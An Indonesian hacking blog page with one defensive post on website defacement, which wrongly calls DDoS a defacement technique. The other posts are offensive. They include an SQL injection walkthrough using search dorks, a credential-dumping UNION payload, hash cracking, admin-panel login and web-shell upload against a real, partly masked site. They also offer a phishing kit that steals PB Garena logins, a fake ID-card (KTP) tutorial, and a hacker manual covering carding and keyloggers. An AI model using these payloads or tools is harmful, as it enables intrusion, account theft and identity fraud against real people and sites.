Pengantar:

Selamat Datang Di All In BLOG

Latest Updates

View More Articles

Wednesday, February 10, 2021

Deface dan Cara Mengatasinya

 Suatu website dibuat, kemungkinan masih ada bug didalam kodenya. Bug tersebut kadang bisa dimanfaatkan oleh pengguna yang tidak bertanggung jawab dan kadang bisa membuat website tersebut bermasalah.

Deface adalah serangan terhadap situs web yang mengubah tampilan visual situs web atau halaman web. (Wikipedia). Orang yang melakukan Deface disebut dengan istilah Defacer, Defacer bisa mengubah tampilan website target sesuai dengan keinginan mereka. Salah satu teknik yang sangat terkenal dalam proses Deface ini adalah DDoS atau Denial of Service (mengirimkan request palsu pada server website sehingga server akan menjadi lambat dan down).

Defacer sering menyasar pada website-website pemerintahan atau website perusahaan, jarang menyasar pada website pribadi. Tujuan utamanya biasanya untuk menyampaikan pesan kepada instansi terkait.

Cara Melindungi Website dari Defacement

01. Rutin melakukan upgrade / update perangkat lunak website (OS, CMS, Themes, Plugins, dan sebagainya)
02. Gunakan firewall untuk menjaga dari akses orang yang tidak bertanggung jawab. Firewall bekerja dengan mengamati IP yang masuk, sehingga jika ada IP yang mencurigakan bisa dicegah sedari awal.
03. Selalu backup website secara berkala agar aman saat terjadi suatu hal yang tidak diinginkan
04. Lakukan vulnerability scanning secara rutin dan lakukan private security test secara berkala.
05. Buat Credential Login yang Sulit. Menggunakan credential login yang sulit akan meningkatkan keamanan website Anda. Sebab, peretas akan lebih sulit membobol website Anda. Caranya, ubah default login dengan username unik. Selain itu, gunakan password yang panjang dengan kombinasi huruf, angka dan karakter khusus. Misalnya: “St0P1t!y00”. 


Sumber referensi: 
https://id.m.wikipedia.org/wiki/Perusakan_situs_web
https://www.niagahoster.co.id/blog/deface-adalah/?amp
https://www.kompasiana.com/amp/leafcoder/5e252a2c097f3667777f4b42/apa-itu-deface-bagaimana-cara-mencegahnya
https://qwords.com/blog/apa-itu-deface-website/

Tuesday, March 21, 2017

Toolkit V3.0

Update ke 4.0 tools
Python 2.7 & Python 3.4 udah terinstall mblo..
########### Step  ###########
1. [Khusus] Yg pernah menginstal toolgblk old version sebaiknya di uninstall dulu
Caranya buka terminal
    -  su
    -  un-gblk
Tunggu hingga prosses uninstall selesai
2. Cara penginstalan sama seperti cara yg lama eksktrak toolgblok.zip keluar folder sdcard
3. Buka terminal emulator ketik
  - su
  - cd sdcard
  - sh pasang
Tunggu hingga proses pemasangan selesai
4 cara menjalankan ToolGblk
  Buka terminal emulator
Ketik:
     - su
     - bootbrew
     - gblk
########## selesai ########
#########Thanks to #######
- Arfian dicky firmansyah (mr.Jav)
- syifani abdulah (ketua dev)
- nunul azmi.
- Exsan drtt.
All member fa2as
Python
Botbrew
##########################
Tanya2 dikomentar yang masih bingung
##Copas harap cantumkan Link ##
 
sumber :http://nubidroid45.blogspot.sg

Tuesday, March 14, 2017

Download Inject Simple Maker Injection


(SMI) Simple Maker Injection

Kelebihan :
  • Lebih Simple dan Praktis
  • Tampilan lebih Responsive
  • Mudah Terkoneksi
  • Free Trafic Data
Kekurangan :
  • Fitur Split kurang


Link Download | Disini

password : all-inblog10

Friday, March 3, 2017

Deface POC: SQL Injection

Bagi kalian jasa pembuatan website / Developer Web , perlu mengetahui tentang ini . Agar keamanan web lebih aman.
Langasung saja .
Dork  :
  • Inurl:kategori-23-hiburan.html
  • Inurl:hal-tentang-kami.html
  • Inurl:statis-1-pengantar.html
  • Inurl:statis-19-beasiswa.html
  • Inurl:statis-22-kerjasama.html 
  • Inurl:kategori-10-perpustakaan.html
Kembangkan biar makin joss

Exploit : /union select /*!50000Concat*/(username,0x20,password)+from+users--+--+

1.Masukan dork dipencarian seperti Google,bing,yahoo/dsb, Lalu pilih target sesuka kalian, kali ini 
   target saya adalah http://des*****gok.id/
2.Kemudian tambahkan ekploitnya 
www.target.***/union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
 2
/u
3.Sekarang sudah kelihatan user sama passwordnya di bagian title :v kemudian ctrl+u untuk melihat 
lebih jelasnya.
4.Sudah terlihat user & passnya...karena masih berbentuk MD5 maka harus di decrypt terlebih dahulu
untuk proses decrypt bisa di situs >  http://hashkiller.co.uk/md5-decrypter.aspx






5.Untuk loginnya biasanya :
http://site/admin
http://site/adminweb
http://site/administrator
http://site/redaktur

6.Kali ini loginnya berada

http://des*****gok.id/adminweb/

masukkan user & pass
hasilnya akan seperti berikut..

Untuk upload shell bisa dibagian download seperti berikut :
Untuk upload shell biasanya di  http://site/files/shellyou

*shell harus berexstensi .phtml


Created by Mr Vandal > Mr Gsl



,


Tuesday, February 28, 2017

Download BUKU SAKTI HACKER (PDF)


Pada Kesempatan kali ini saya akan membagi,buku panduan untuk hacker pemula.

     Detail Buku :
  • Buku : Sakti Hacker
  • Penerbit : Mediakita
  • Author : EFVY ZAM 
  • Halaman : 77 hal.

     Fitur Buku :
  • Carding
  • Deface
  • Phising
  • Keylogger
  • Backdor
  • Trojan
  • Dll
Langsung unduh disini
Sekian dari saya,terima kasih sudah mampir ,semoga bermanfaat
SALAM..



Cara Membuat KTP Palsu/Fake KTP

Asalamualaikum wr.wb
Halo sobat bloggers..
Pada kesempatan kali  ini saya akan berbagi tutorial bagaim
ana caara membuat ktp fake/palsu.
Baikk langsung simak dan ikuti langkah-langkahnya dengan benar.


  • Pertama masuk link klik gambar diatas ^
  • Inputkan gambar. (jpg) max300kb
  • Isi Identitas (terserah anda).
  • Done,tinggal save,
Sekian tutorial kali ini semoga bermanfaat.walaikumsalllam wr.wb

Script Phising PB Gaarena - Turnament True Login

Pada kesempatan kali ini saya akan berbagi Script PB Garena  Turnament True Login.
Script ini memiliki tampilan responsive dan  elegan.
Baikk langsung saja...

Cara pemasangan :
1.Pastikan anda mempunya hostingan/CPanel/WHM
2.Download bahannnya disini
3.Upload filenya
4.Ekstract di file manager Hosting/CPanel sobat
5.Edit file Email.php ganti "isiemailmu@gmail.com" dengan email anda.
6.Save ,done

SS :




Password : all-inblog10.blogspot.co.id
sumber :toturialblogku24

Copyright @ 2017 All In Blog. Powered by Army Pedia | Design Templateism | Love for The Globe Press
,